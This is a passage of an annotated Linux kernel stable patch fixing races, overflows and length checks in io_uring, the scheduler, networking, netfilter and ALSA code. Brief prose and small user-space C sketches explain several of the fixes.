+@@ -170,12 +170,11 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 		xa_for_each(&ctx->personalities, index, cred)
+ 			io_uring_show_cred(m, index, cred);
+ 	}
+-	if (has_lock)
+-		mutex_unlock(&ctx->uring_lock);
+ 
+ 	seq_puts(m, "PollList:\n");
+ 	for (i = 0; i < (1U << ctx->cancel_table.hash_bits); i++) {
+ 		struct io_hash_bucket *hb = &ctx->cancel_table.hbs[i];
++		struct io_hash_bucket *hbl = &ctx->cancel_table_locked.hbs[i];
+ 		struct io_kiocb *req;
+ 
+ 		spin_lock(&hb->lock);
+@@ -183,8 +182,17 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 			seq_printf(m, "  op=%d, task_works=%d\n", req->opcode,
+ 					task_work_pending(req->task));
+ 		spin_unlock(&hb->lock);
++
++		if (!has_lock)
++			continue;
++		hlist_for_each_entry(req, &hbl->list, hash_node)
++			seq_printf(m, "  op=%d, task_works=%d\n", req->opcode,
++					task_work_pending(req->task));
+ 	}
+ 
++	if (has_lock)
++		mutex_unlock(&ctx->uring_lock);
++
+ 	seq_puts(m, "CqOverflowList:\n");
+ 	spin_lock(&ctx->completion_lock);
+ 	list_for_each_entry(ocqe, &ctx->cq_overflow_list, list) {
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 6f1d0e5df23ad..411bb2d1acd45 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -1230,6 +1230,12 @@ static void io_wq_cancel_tw_create(struct io_wq *wq)
+ 
+ 		worker = container_of(cb, struct io_worker, create_work);
+ 		io_worker_cancel_cb(worker);
++		/*
++		 * Only the worker continuation helper has worker allocated and
++		 * hence needs freeing.
++		 */
++		if (cb->func == create_worker_cont)
++			kfree(worker);
+ 	}
+ }
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index fded1445a803b..f2f9f174fc620 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -223,22 +223,23 @@ enum {
+ 	IOU_POLL_DONE = 0,
+ 	IOU_POLL_NO_ACTION = 1,
+ 	IOU_POLL_REMOVE_POLL_USE_RES = 2,
++	IOU_POLL_REISSUE = 3,
+ };
+ 
+ /*
+  * All poll tw should go through this. Checks for poll events, manages
+  * references, does rewait, etc.
+  *
+- * Returns a negative error on failure. IOU_POLL_NO_ACTION when no action require,
+- * which is either spurious wakeup or multishot CQE is served.
+- * IOU_POLL_DONE when it's done with the request, then the mask is stored in req->cqe.res.
+- * IOU_POLL_REMOVE_POLL_USE_RES indicates to remove multishot poll and that the result
+- * is stored in req->cqe.
++ * Returns a negative error on failure. IOU_POLL_NO_ACTION when no action
++ * is required, meaning either a spurious wakeup or a served multishot CQE.
++ * IOU_POLL_DONE when it's done with the request, then the mask is stored in
++ * req->cqe.res. IOU_POLL_REMOVE_POLL_USE_RES indicates to remove multishot
++ * poll and that the result is stored in req->cqe.
+  */
+ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ {
+ 	struct io_ring_ctx *ctx = req->ctx;
+-	int v, ret;
++	int v;
+ 
+ 	/* req->task == current here, checking PF_EXITING is safe */
+ 	if (unlikely(req->task->flags & PF_EXITING))
+@@ -274,10 +275,15 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 		if (!req->cqe.res) {
+ 			struct poll_table_struct pt = { ._key = req->apoll_events };
+ 			req->cqe.res = vfs_poll(req->file, &pt) & req->apoll_events;
++			/*
++			 * We got woken with a mask, but someone else got to
++			 * it first. The above vfs_poll() doesn't add us back
++			 * to the waitqueue, so if we get nothing back, we
++			 * should be safe and attempt a reissue.
++			 */
++			if (unlikely(!req->cqe.res))
++				return IOU_POLL_REISSUE;
+ 		}
+-
+-		if ((unlikely(!req->cqe.res)))
+-			continue;
+ 		if (req->apoll_events & EPOLLONESHOT)
+ 			return IOU_POLL_DONE;
+ 		if (io_is_uring_fops(req->file))
+@@ -294,7 +300,7 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 				return IOU_POLL_REMOVE_POLL_USE_RES;
+ 			}
+ 		} else {
+-			ret = io_poll_issue(req, locked);
++			int ret = io_poll_issue(req, locked);
+ 			if (ret == IOU_STOP_MULTISHOT)
+ 				return IOU_POLL_REMOVE_POLL_USE_RES;
+ 			if (ret < 0)
+@@ -325,6 +331,11 @@ static void io_poll_task_func(struct io_kiocb *req, bool *locked)
+ 	if (ret == IOU_POLL_DONE) {
+ 		struct io_poll *poll = io_kiocb_to_cmd(req, struct io_poll);
+ 		req->cqe.res = mangle_poll(req->cqe.res & poll->events);
++	} else if (ret == IOU_POLL_REISSUE) {
++		io_poll_remove_entries(req);
++		io_poll_tw_hash_eject(req, locked);
++		io_req_task_submit(req, locked);
++		return;
+ 	} else if (ret != IOU_POLL_REMOVE_POLL_USE_RES) {
+ 		req->cqe.res = ret;
+ 		req_set_fail(req);
+@@ -350,7 +361,7 @@ static void io_apoll_task_func(struct io_kiocb *req, bool *locked)
+ 
+ 	if (ret == IOU_POLL_REMOVE_POLL_USE_RES)
+ 		io_req_complete_post(req);
+-	else if (ret == IOU_POLL_DONE)
++	else if (ret == IOU_POLL_DONE || ret == IOU_POLL_REISSUE)
+ 		io_req_task_submit(req, locked);
+ 	else
+ 		io_req_complete_failed(req, ret);
+@@ -549,6 +560,14 @@ static bool io_poll_can_finish_inline(struct io_kiocb *req,
+ 	return pt->owning || io_poll_get_ownership(req);
+ }
+ 
++static void io_poll_add_hash(struct io_kiocb *req)
++{
++	if (req->flags & REQ_F_HASH_LOCKED)
++		io_poll_req_insert_locked(req);
++	else
++		io_poll_req_insert(req);
++}
++
+ /*
+  * Returns 0 when it's handed over for polling. The caller owns the requests if
+  * it returns non-zero, but otherwise should not touch it. Negative values
+@@ -607,18 +626,17 @@ static int __io_arm_poll_handler(struct io_kiocb *req,
+ 
+ 	if (mask &&
+ 	   ((poll->events & (EPOLLET|EPOLLONESHOT)) == (EPOLLET|EPOLLONESHOT))) {
+-		if (!io_poll_can_finish_inline(req, ipt))
++		if (!io_poll_can_finish_inline(req, ipt)) {
++			io_poll_add_hash(req);
+ 			return 0;
++		}
+ 		io_poll_remove_entries(req);
+ 		ipt->result_mask = mask;
+ 		/* no one else has access to the req, forget about the ref */
+ 		return 1;
+ 	}
+ 
+-	if (req->flags & REQ_F_HASH_LOCKED)
+-		io_poll_req_insert_locked(req);
+-	else
+-		io_poll_req_insert(req);
++	io_poll_add_hash(req);
+ 
+ 	if (mask && (poll->events & EPOLLET) &&
+ 	    io_poll_can_finish_inline(req, ipt)) {
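
The poll.c changes above add a fourth return code, IOU_POLL_REISSUE, and route it in both task_func paths. A minimal user-space sketch of that four-way dispatch, with simplified stand-in names rather than the kernel's real types:

/*
 * Minimal sketch of the routing that io_poll_task_func() performs on the
 * result of io_poll_check_events(). The handling shown in each case is a
 * simplified stand-in for the kernel's actual completion paths.
 */
#include <stdio.h>

enum poll_ret {
	IOU_POLL_DONE = 0,
	IOU_POLL_NO_ACTION = 1,
	IOU_POLL_REMOVE_POLL_USE_RES = 2,
	IOU_POLL_REISSUE = 3,
};

static void route(enum poll_ret ret)
{
	switch (ret) {
	case IOU_POLL_NO_ACTION:
		/* spurious wakeup or multishot CQE already posted: wait again */
		printf("no action\n");
		break;
	case IOU_POLL_DONE:
		/* mask is in req->cqe.res: post the completion */
		printf("post completion\n");
		break;
	case IOU_POLL_REISSUE:
		/* vfs_poll() returned 0: drop the poll entries, resubmit */
		printf("remove entries, resubmit request\n");
		break;
	case IOU_POLL_REMOVE_POLL_USE_RES:
		/* result already stored in req->cqe: just tear down the poll */
		printf("remove poll, use stored result\n");
		break;
	}
}

int main(void)
{
	route(IOU_POLL_REISSUE);
	return 0;
}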
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index bb47cc4da713c..6223472095d2c 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -1055,7 +1055,11 @@ int io_do_iopoll(struct io_ring_ctx *ctx, bool force_nonspin)
+ 			continue;
+ 
+ 		req->cqe.flags = io_put_kbuf(req, 0);
+-		__io_fill_cqe_req(req->ctx, req);
++		if (unlikely(!__io_fill_cqe_req(ctx, req))) {
++			spin_lock(&ctx->completion_lock);
++			io_req_cqe_overflow(req);
++			spin_unlock(&ctx->completion_lock);
++		}
+ 	}
+ 
+ 	if (unlikely(!nr_events))
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 535af9fbea7b8..172ec79b66f6c 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2587,14 +2587,43 @@ void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
+ int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
+ 		      int node)
+ {
+-	if (!src->user_cpus_ptr)
++	cpumask_t *user_mask;
++	unsigned long flags;
++
++	/*
++	 * Always clear dst->user_cpus_ptr first, as the source and
++	 * destination user_cpus_ptr values may already differ due to racing.
++	 */
++	dst->user_cpus_ptr = NULL;
++
++	/*
++	 * This check is racy and losing the race is a valid situation.
++	 * It is not worth the extra overhead of taking the pi_lock on
++	 * every fork/clone.
++	 */
++	if (data_race(!src->user_cpus_ptr))
+ 		return 0;
+ 
+-	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
+-	if (!dst->user_cpus_ptr)
++	user_mask = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!user_mask)
+ 		return -ENOMEM;
+ 
+-	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	/*
++	 * Use pi_lock to protect content of user_cpus_ptr
++	 *
++	 * Though unlikely, user_cpus_ptr can be reset to NULL by a concurrent
++	 * do_set_cpus_allowed().
++	 */
++	raw_spin_lock_irqsave(&src->pi_lock, flags);
++	if (src->user_cpus_ptr) {
++		swap(dst->user_cpus_ptr, user_mask);
++		cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	}
++	raw_spin_unlock_irqrestore(&src->pi_lock, flags);
++
++	if (unlikely(user_mask))
++		kfree(user_mask);
++
+ 	return 0;
+ }
+ 
+@@ -5469,7 +5498,9 @@ void scheduler_tick(void)
+ 	unsigned long thermal_pressure;
+ 	u64 resched_latency;
+ 
+-	arch_scale_freq_tick();
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		arch_scale_freq_tick();
++
+ 	sched_clock_tick();
+ 
+ 	rq_lock(rq, &rf);
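
The dup_user_cpus_ptr() rework above follows a common pattern: allocate the buffer before taking pi_lock, publish it with swap() under the lock only if the source mask is still there, and free whichever buffer ends up unused. A minimal user-space sketch of the same shape, using pthreads and illustrative names:

/*
 * User-space sketch of the allocate-outside-the-lock pattern used by
 * dup_user_cpus_ptr() above. All names here are illustrative stand-ins.
 */
#include <pthread.h>
#include <stdlib.h>
#include <string.h>

struct task {
	pthread_mutex_t lock;
	char *mask;               /* may be reset to NULL concurrently */
};

static int dup_mask(struct task *dst, struct task *src, size_t len)
{
	char *buf, *tmp;

	dst->mask = NULL;         /* dst may hold a stale pointer */

	buf = malloc(len);        /* allocate before taking the lock */
	if (!buf)
		return -1;

	pthread_mutex_lock(&src->lock);
	if (src->mask) {          /* source may have vanished meanwhile */
		tmp = dst->mask;  /* open-coded swap(dst->mask, buf) */
		dst->mask = buf;
		buf = tmp;
		memcpy(dst->mask, src->mask, len);
	}
	pthread_mutex_unlock(&src->lock);

	free(buf);                /* NULL or the unused buffer */
	return 0;
}

int main(void)
{
	struct task src = { PTHREAD_MUTEX_INITIALIZER, strdup("0-3") };
	struct task dst = { PTHREAD_MUTEX_INITIALIZER, NULL };

	return dup_mask(&dst, &src, 4);
}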
+diff --git a/mm/memblock.c b/mm/memblock.c
+index 511d4783dcf1d..fc3d8fbd2060d 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -1640,7 +1640,13 @@ void __init memblock_free_late(phys_addr_t base, phys_addr_t size)
+ 	end = PFN_DOWN(base + size);
+ 
+ 	for (; cursor < end; cursor++) {
+-		memblock_free_pages(pfn_to_page(cursor), cursor, 0);
++		/*
++		 * Reserved pages are always initialized by the end of
++		 * memblock_free_all() (by memmap_init() and, if deferred
++		 * initialization is enabled, memmap_init_reserved_pages()), so
++		 * these pages can be released directly to the buddy allocator.
++		 */
++		__free_pages_core(pfn_to_page(cursor), 0);
+ 		totalram_pages_inc();
+ 	}
+ }
+diff --git a/net/core/gro.c b/net/core/gro.c
+index bc9451743307b..1b4abfb9a7a13 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -489,45 +489,46 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(ptype, head, list) {
+-		if (ptype->type != type || !ptype->callbacks.gro_receive)
+-			continue;
+-
+-		skb_set_network_header(skb, skb_gro_offset(skb));
+-		skb_reset_mac_len(skb);
+-		BUILD_BUG_ON(sizeof_field(struct napi_gro_cb, zeroed) != sizeof(u32));
+-		BUILD_BUG_ON(!IS_ALIGNED(offsetof(struct napi_gro_cb, zeroed),
+-					 sizeof(u32))); /* Avoid slow unaligned acc */
+-		*(u32 *)&NAPI_GRO_CB(skb)->zeroed = 0;
+-		NAPI_GRO_CB(skb)->flush = skb_has_frag_list(skb);
+-		NAPI_GRO_CB(skb)->is_atomic = 1;
+-		NAPI_GRO_CB(skb)->count = 1;
+-		if (unlikely(skb_is_gso(skb))) {
+-			NAPI_GRO_CB(skb)->count = skb_shinfo(skb)->gso_segs;
+-			/* Only support TCP at the moment. */
+-			if (!skb_is_gso_tcp(skb))
+-				NAPI_GRO_CB(skb)->flush = 1;
+-		}
+-
+-		/* Setup for GRO checksum validation */
+-		switch (skb->ip_summed) {
+-		case CHECKSUM_COMPLETE:
+-			NAPI_GRO_CB(skb)->csum = skb->csum;
+-			NAPI_GRO_CB(skb)->csum_valid = 1;
+-			break;
+-		case CHECKSUM_UNNECESSARY:
+-			NAPI_GRO_CB(skb)->csum_cnt = skb->csum_level + 1;
+-			break;
+-		}
++		if (ptype->type == type && ptype->callbacks.gro_receive)
++			goto found_ptype;
++	}
++	rcu_read_unlock();
++	goto normal;
++
++found_ptype:
++	skb_set_network_header(skb, skb_gro_offset(skb));
++	skb_reset_mac_len(skb);
++	BUILD_BUG_ON(sizeof_field(struct napi_gro_cb, zeroed) != sizeof(u32));
++	BUILD_BUG_ON(!IS_ALIGNED(offsetof(struct napi_gro_cb, zeroed),
++					sizeof(u32))); /* Avoid slow unaligned acc */
++	*(u32 *)&NAPI_GRO_CB(skb)->zeroed = 0;
++	NAPI_GRO_CB(skb)->flush = skb_has_frag_list(skb);
++	NAPI_GRO_CB(skb)->is_atomic = 1;
++	NAPI_GRO_CB(skb)->count = 1;
++	if (unlikely(skb_is_gso(skb))) {
++		NAPI_GRO_CB(skb)->count = skb_shinfo(skb)->gso_segs;
++		/* Only support TCP and non-DODGY users. */
++		if (!skb_is_gso_tcp(skb) ||
++		    (skb_shinfo(skb)->gso_type & SKB_GSO_DODGY))
++			NAPI_GRO_CB(skb)->flush = 1;
++	}
+ 
+-		pp = INDIRECT_CALL_INET(ptype->callbacks.gro_receive,
+-					ipv6_gro_receive, inet_gro_receive,
+-					&gro_list->list, skb);
++	/* Setup for GRO checksum validation */
++	switch (skb->ip_summed) {
++	case CHECKSUM_COMPLETE:
++		NAPI_GRO_CB(skb)->csum = skb->csum;
++		NAPI_GRO_CB(skb)->csum_valid = 1;
++		break;
++	case CHECKSUM_UNNECESSARY:
++		NAPI_GRO_CB(skb)->csum_cnt = skb->csum_level + 1;
+ 		break;
+ 	}
+-	rcu_read_unlock();
+ 
+-	if (&ptype->list == head)
+-		goto normal;
++	pp = INDIRECT_CALL_INET(ptype->callbacks.gro_receive,
++				ipv6_gro_receive, inet_gro_receive,
++				&gro_list->list, skb);
++
++	rcu_read_unlock();
+ 
+ 	if (PTR_ERR(pp) == -EINPROGRESS) {
+ 		ret = GRO_CONSUMED;
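
The gro.c hunk restructures the classic "do the work inside the list walk" loop into a find-then-handle shape: the loop only locates a matching ptype and jumps to found_ptype, and the old "&ptype->list == head" no-match test disappears. The same refactor reduced to plain C lists (types here are illustrative):

/*
 * Shape of the refactor in the gro.c hunk above. The loop only finds the
 * element; the body runs once after a goto, and the no-match path falls
 * through to the fallback immediately.
 */
#include <stdio.h>

struct handler { int type; struct handler *next; };

static void dispatch(struct handler *head, int type)
{
	struct handler *h;

	for (h = head; h; h = h->next)
		if (h->type == type)
			goto found;
	printf("no handler: fall back to normal path\n");
	return;

found:
	printf("handling type %d\n", h->type);
}

int main(void)
{
	struct handler b = { 2, NULL }, a = { 1, &b };
	dispatch(&a, 2);
	return 0;
}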
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 722de9dd0ff78..8ffeac7456567 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -505,6 +505,7 @@ csum_copy_err:
+ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
+ 				     struct raw6_sock *rp)
+ {
++	struct ipv6_txoptions *opt;
+ 	struct sk_buff *skb;
+ 	int err = 0;
+ 	int offset;
+@@ -522,6 +523,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
+ 
+ 	offset = rp->offset;
+ 	total_len = inet_sk(sk)->cork.base.length;
++	opt = inet6_sk(sk)->cork.opt;
++	total_len -= opt ? opt->opt_flen : 0;
++
+ 	if (offset >= total_len - 1) {
+ 		err = -EINVAL;
+ 		ip6_flush_pending_frames(sk);
+diff --git a/net/netfilter/ipset/ip_set_bitmap_ip.c b/net/netfilter/ipset/ip_set_bitmap_ip.c
+index a8ce04a4bb72a..e4fa00abde6a2 100644
+--- a/net/netfilter/ipset/ip_set_bitmap_ip.c
++++ b/net/netfilter/ipset/ip_set_bitmap_ip.c
+@@ -308,8 +308,8 @@ bitmap_ip_create(struct net *net, struct ip_set *set, struct nlattr *tb[],
+ 			return -IPSET_ERR_BITMAP_RANGE;
+ 
+ 		pr_debug("mask_bits %u, netmask %u\n", mask_bits, netmask);
+-		hosts = 2 << (32 - netmask - 1);
+-		elements = 2 << (netmask - mask_bits - 1);
++		hosts = 2U << (32 - netmask - 1);
++		elements = 2UL << (netmask - mask_bits - 1);
+ 	}
+ 	if (elements > IPSET_BITMAP_MAX_RANGE + 1)
+ 		return -IPSET_ERR_BITMAP_RANGE_SIZE;
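
The ipset fix is purely about integer width: hosts and elements are computed with shifts whose operands were plain int. A quick demonstration of what the 2U/2UL suffixes change (the exact values assume 32-bit int and 64-bit long):

/*
 * "2 << 31" overflows signed int, which is undefined behaviour in C.
 * "2U << 31" is a well-defined unsigned wrap, and "2UL << 31" keeps the
 * full value when long is 64-bit.
 */
#include <stdio.h>

int main(void)
{
	/* 2 << 31 would be signed-overflow UB; don't evaluate it */
	unsigned int  u  = 2U  << 31;   /* wraps to 0 in 32-bit unsigned */
	unsigned long ul = 2UL << 31;   /* 4294967296 on LP64 */

	printf("2U  << 31 = %u\n", u);
	printf("2UL << 31 = %lu\n", ul);
	return 0;
}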
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index 4edd899aeb9bb..d7de2ecb287eb 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -62,7 +62,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
+ 			return false;
+ 
+ 		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
+-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
++			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
+ 
+ 		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);
+ 
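
The nft_payload fix flips one sign: the number of bytes to trim from the copy is how far offset + len runs past the end of the VLAN header region, i.e. past VLAN_ETH_HLEN + vlan_hlen, so vlan_hlen must be subtracted, not added. Worked numbers (VLAN_ETH_HLEN is 18):

/*
 * Worked example for the nft_payload fix above. With a second tag
 * (vlan_hlen = 4) the vlan header region ends at byte 22. A request for
 * offset 16, len 8 runs 2 bytes past it, so only 6 bytes should come
 * from the vlan header buffer.
 */
#include <stdio.h>

#define VLAN_ETH_HLEN 18

int main(void)
{
	unsigned int offset = 16, len = 8, vlan_hlen = 4;
	unsigned int ethlen = len;

	if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
		ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen; /* fixed */

	/* the old "- VLAN_ETH_HLEN + vlan_hlen" would subtract 10, not 2 */
	printf("copy %u bytes from the vlan header\n", ethlen);     /* 6 */
	return 0;
}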
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index 8ad25cc8ccd55..ea5959094adb0 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -132,6 +132,11 @@ static int valid_label(const struct nlattr *attr,
+ {
+ 	const u32 *label = nla_data(attr);
+ 
++	if (nla_len(attr) != sizeof(*label)) {
++		NL_SET_ERR_MSG_MOD(extack, "Invalid MPLS label length");
++		return -EINVAL;
++	}
++
+ 	if (*label & ~MPLS_LABEL_MASK || *label == MPLS_LABEL_IMPLNULL) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MPLS label out of range");
+ 		return -EINVAL;
+@@ -143,7 +148,8 @@ static int valid_label(const struct nlattr *attr,
+ static const struct nla_policy mpls_policy[TCA_MPLS_MAX + 1] = {
+ 	[TCA_MPLS_PARMS]	= NLA_POLICY_EXACT_LEN(sizeof(struct tc_mpls)),
+ 	[TCA_MPLS_PROTO]	= { .type = NLA_U16 },
+-	[TCA_MPLS_LABEL]	= NLA_POLICY_VALIDATE_FN(NLA_U32, valid_label),
++	[TCA_MPLS_LABEL]	= NLA_POLICY_VALIDATE_FN(NLA_BINARY,
++							 valid_label),
+ 	[TCA_MPLS_TC]		= NLA_POLICY_RANGE(NLA_U8, 0, 7),
+ 	[TCA_MPLS_TTL]		= NLA_POLICY_MIN(NLA_U8, 1),
+ 	[TCA_MPLS_BOS]		= NLA_POLICY_RANGE(NLA_U8, 0, 1),
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index 49ddc484c4fe7..5e000fde80676 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -1179,8 +1179,9 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	bool addr_match = false;
+ 	bool sign_match = false;
+ 	bool link_up = false;
++	bool link_is_reset = false;
+ 	bool accept_addr = false;
+-	bool reset = true;
++	bool reset = false;
+ 	char *if_name;
+ 	unsigned long intv;
+ 	u16 session;
+@@ -1200,14 +1201,14 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	/* Prepare to validate requesting node's signature and media address */
+ 	l = le->link;
+ 	link_up = l && tipc_link_is_up(l);
++	link_is_reset = l && tipc_link_is_reset(l);
+ 	addr_match = l && !memcmp(&le->maddr, maddr, sizeof(*maddr));
+ 	sign_match = (signature == n->signature);
+ 
+ 	/* These three flags give us eight permutations: */
+ 
+ 	if (sign_match && addr_match && link_up) {
+-		/* All is fine. Do nothing. */
+-		reset = false;
++		/* All is fine. Ignore requests. */
+ 		/* Peer node is not a container/local namespace */
+ 		if (!n->peer_hash_mix)
+ 			n->peer_hash_mix = hash_mixes;
+@@ -1232,6 +1233,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		 */
+ 		accept_addr = true;
+ 		*respond = true;
++		reset = true;
+ 	} else if (!sign_match && addr_match && link_up) {
+ 		/* Peer node rebooted. Two possibilities:
+ 		 *  - Delayed re-discovery; this link endpoint has already
+@@ -1263,6 +1265,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		n->signature = signature;
+ 		accept_addr = true;
+ 		*respond = true;
++		reset = true;
+ 	}
+ 
+ 	if (!accept_addr)
+@@ -1291,6 +1294,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		tipc_link_fsm_evt(l, LINK_RESET_EVT);
+ 		if (n->state == NODE_FAILINGOVER)
+ 			tipc_link_fsm_evt(l, LINK_FAILOVER_BEGIN_EVT);
++		link_is_reset = tipc_link_is_reset(l);
+ 		le->link = l;
+ 		n->link_cnt++;
+ 		tipc_node_calculate_timer(n, l);
+@@ -1303,7 +1307,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	memcpy(&le->maddr, maddr, sizeof(*maddr));
+ exit:
+ 	tipc_node_write_unlock(n);
+-	if (reset && l && !tipc_link_is_reset(l))
++	if (reset && !link_is_reset)
+ 		tipc_node_link_down(n, b->identity, false);
+ 	tipc_node_put(n);
+ }
+diff --git a/sound/core/control_led.c b/sound/core/control_led.c
+index f975cc85772bb..3cadd40100f3e 100644
+--- a/sound/core/control_led.c
++++ b/sound/core/control_led.c
+@@ -530,12 +530,11 @@ static ssize_t set_led_id(struct snd_ctl_led_card *led_card, const char *buf, si
+ 			  bool attach)
+ {
+ 	char buf2[256], *s, *os;
+-	size_t len = max(sizeof(s) - 1, count);
+ 	struct snd_ctl_elem_id id;
+ 	int err;
+ 
+-	strncpy(buf2, buf, len);
+-	buf2[len] = '\0';
++	if (strscpy(buf2, buf, sizeof(buf2)) < 0)
++		return -E2BIG;
+ 	memset(&id, 0, sizeof(id));
+ 	id.iface = SNDRV_CTL_ELEM_IFACE_MIXER;
+ 	s = buf2;
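
The control_led.c bug is the classic sizeof-on-a-pointer mistake: sizeof(s) for a char * is the pointer size, so max(sizeof(s) - 1, count) was unrelated to the destination buffer and could overrun buf2. strscpy() bounds the copy by the destination and returns negative on truncation; a user-space sketch of the same idea (strscpy itself is kernel-only, so snprintf stands in):

/*
 * sizeof(s) on a "char *s" is the pointer size, not the buffer size.
 * The bounded copy below is keyed to the destination, like
 * strscpy(buf2, buf, sizeof(buf2)) in the fixed kernel code.
 */
#include <stdio.h>
#include <string.h>

int main(void)
{
	char buf2[256];
	const char *buf = "mixer iface";
	char *s = buf2;

	printf("sizeof(s)    = %zu (pointer!)\n", sizeof(s));    /* 8 on LP64 */
	printf("sizeof(buf2) = %zu (buffer)\n", sizeof(buf2));   /* 256 */

	if (snprintf(buf2, sizeof(buf2), "%s", buf) >= (int)sizeof(buf2))
		return 1;   /* truncated: would map to -E2BIG in the kernel */
	puts(s);
	return 0;
}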
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 764eb07bbaff4..6fab7c8fc19ae 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -3564,6 +3564,15 @@ static void alc256_init(struct hda_codec *codec)
+ 	hda_nid_t hp_pin = alc_get_hp_pin(spec);
+ 	bool hp_pin_sense;
+ 
++	if (spec->ultra_low_power) {
++		alc_update_coef_idx(codec, 0x03, 1<<1, 1<<1);
++		alc_update_coef_idx(codec, 0x08, 3<<2, 3<<2);
++		alc_update_coef_idx(codec, 0x08, 7<<4, 0);
++		alc_update_coef_idx(codec, 0x3b, 1<<15, 0);
++		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
++		msleep(30);
++	}
++
+ 	if (!hp_pin)
+ 		hp_pin = 0x21;
+ 
+@@ -3575,14 +3584,6 @@ static void alc256_init(struct hda_codec *codec)
+ 		msleep(2);
+ 
+ 	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+-	if (spec->ultra_low_power) {
+-		alc_update_coef_idx(codec, 0x03, 1<<1, 1<<1);
+-		alc_update_coef_idx(codec, 0x08, 3<<2, 3<<2);
+-		alc_update_coef_idx(codec, 0x08, 7<<4, 0);
+-		alc_update_coef_idx(codec, 0x3b, 1<<15, 0);
+-		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
+-		msleep(30);
+-	}
+ 
+ 	snd_hda_codec_write(codec, hp_pin, 0,
+ 			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+@@ -3713,6 +3714,13 @@ static void alc225_init(struct hda_codec *codec)
+ 	hda_nid_t hp_pin = alc_get_hp_pin(spec);
+ 	bool hp1_pin_sense, hp2_pin_sense;
+ 
++	if (spec->ultra_low_power) {
++		alc_update_coef_idx(codec, 0x08, 0x0f << 2, 3<<2);
++		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
++		alc_update_coef_idx(codec, 0x33, 1<<11, 0);
++		msleep(30);
++	}
++
+ 	if (spec->codec_variant != ALC269_TYPE_ALC287 &&
+ 		spec->codec_variant != ALC269_TYPE_ALC245)
+ 		/* required only at boot or S3 and S4 resume time */
+@@ -3734,12 +3742,6 @@ static void alc225_init(struct hda_codec *codec)
+ 		msleep(2);
+ 
+ 	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+-	if (spec->ultra_low_power) {
+-		alc_update_coef_idx(codec, 0x08, 0x0f << 2, 3<<2);
+-		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
+-		alc_update_coef_idx(codec, 0x33, 1<<11, 0);
+-		msleep(30);
+-	}
+ 
+ 	if (hp1_pin_sense || spec->ultra_low_power)
+ 		snd_hda_codec_write(codec, hp_pin, 0,
+@@ -4644,6 +4646,16 @@ static void alc285_fixup_hp_coef_micmute_led(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc285_fixup_hp_gpio_micmute_led(struct hda_codec *codec,
++				const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE)
++		spec->micmute_led_polarity = 1;
++	alc_fixup_hp_gpio_led(codec, action, 0, 0x04);
++}
++
